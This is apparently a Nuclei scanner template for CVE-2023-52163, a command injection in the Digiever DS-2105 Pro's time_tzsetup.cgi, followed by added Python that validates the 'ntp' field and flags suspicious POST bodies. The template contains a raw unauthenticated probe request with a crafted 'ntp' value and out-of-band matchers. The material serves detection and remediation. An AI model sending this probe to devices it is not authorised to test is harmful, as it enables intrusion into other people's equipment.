Vulnerability description
Digiever DS-2105 Pro 3.1.0.71-11 contains a command injection vulnerability caused by unsanitized input in time_tzsetup.cgi, allowing remote attackers to execute arbitrary commands; exploitation requires no authentication.
id: CVE-2023-52163

info:
  name: Digiever DS-2105 Pro - Command Injection
  author: rajesh-social-tech
  severity: high
  description: |
    Digiever DS-2105 Pro 3.1.0.71-11 contains a command injection vulnerability caused by unsanitized input in time_tzsetup.cgi, allowing remote attackers to execute arbitrary commands; exploitation requires no authentication.
  impact: |
    Remote attackers can execute arbitrary commands on the device, potentially leading to full device compromise.
  remediation: |
    Update to a supported version or contact the vendor for security patches.
  reference:
    - https://www.txone.com/blog/digiever-fixes-sorely-needed/
    - https://www.fortiguard.com/encyclopedia/ips/57266
    - https://github.com/advisories/GHSA-mrvx-3qrr-qqxw
  metadata:
    max-request: 1
    verified: false
  tags: cve,cve2023,digiever,rce,oast,oob,kev,vkev

http:
  - raw:
      - |
        POST /cgi-bin/cgi_main.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cgiName=time_tzsetup.cgi&ntp=/etc/digigiver-release&action=4

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(interactsh_protocol,'dns')
          - contains(header, 'IE=EmulateIE10')
        condition: and
# digest: 4a0a00473045022100b0ae1103f92020f574e8a7a9eda76f996b1d55505de33d36777bd02da787cf89022071cf164d225e0c2fb3a80247a8b4c452fc6ab672035e9738651643ece6d315d0:922c64590222798bb761d5b6d8e72950
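The root cause named in the description is that the `ntp` value handed to time_tzsetup.cgi is never validated before it reaches a shell. The following Python is an added example, not vendor code and not part of the Nuclei template above: it shows the allowlist check the CGI should apply to `ntp` (a hostname or IPv4 address, nothing else) and reuses the same check as a detection over captured POST bodies to cgi_main.cgi. The sample bodies are constructed for the example; the one containing `/etc/digigiver-release` is the body from the template. The assumption that `ntp` is meant to carry an NTP server name follows from the parameter name, not from vendor documentation.

```python
import re
from urllib.parse import parse_qs

# Allowlist for a legitimate NTP server value: an RFC-1123-style hostname or a
# dotted-quad IPv4 address. Paths, whitespace and shell metacharacters all fail.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
_IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)


def is_valid_ntp_server(value: str) -> bool:
    """Server-side check the CGI should perform before using the value at all."""
    return bool(_IPV4_RE.match(value) or _HOSTNAME_RE.match(value))


def inspect_time_tzsetup_body(body: str) -> dict:
    """Parse a cgi_main.cgi POST body and report whether it targets
    time_tzsetup.cgi with an ntp value that fails the allowlist."""
    params = parse_qs(body, keep_blank_values=True)
    cgi_name = params.get("cgiName", [""])[0]
    result = {
        "targets_time_tzsetup": cgi_name == "time_tzsetup.cgi",
        "ntp": None,
        "suspicious": False,
    }
    if not result["targets_time_tzsetup"]:
        return result
    ntp = params.get("ntp", [""])[0]
    result["ntp"] = ntp
    # Anything that is not a plain hostname/IP has no business in this field.
    result["suspicious"] = not is_valid_ntp_server(ntp)
    return result


# Constructed sample request bodies (the third one is the template's own).
SAMPLE_REQUEST_BODIES = [
    "cgiName=time_tzsetup.cgi&ntp=pool.ntp.org&action=4",
    "cgiName=time_tzsetup.cgi&ntp=192.168.10.5&action=4",
    "cgiName=time_tzsetup.cgi&ntp=/etc/digigiver-release&action=4",
    "cgiName=system_info.cgi&action=1",
]


def flag_suspicious(bodies) -> list:
    """Return the bodies a defender would want to alert on."""
    return [b for b in bodies if inspect_time_tzsetup_body(b)["suspicious"]]


if __name__ == "__main__":
    for body in SAMPLE_REQUEST_BODIES:
        print(inspect_time_tzsetup_body(body))
    print("flagged:", flag_suspicious(SAMPLE_REQUEST_BODIES))
```

The same allowlist serves both sides: as the fix, the CGI rejects the request before the value reaches any shell invocation; as detection, a WAF or log pipeline flags any POST to /cgi-bin/cgi_main.cgi whose `ntp` does not parse as a host. Note that matching only the literal `/etc/digigiver-release` string would miss trivially varied probes, which is why the check is an allowlist rather than a blocklist.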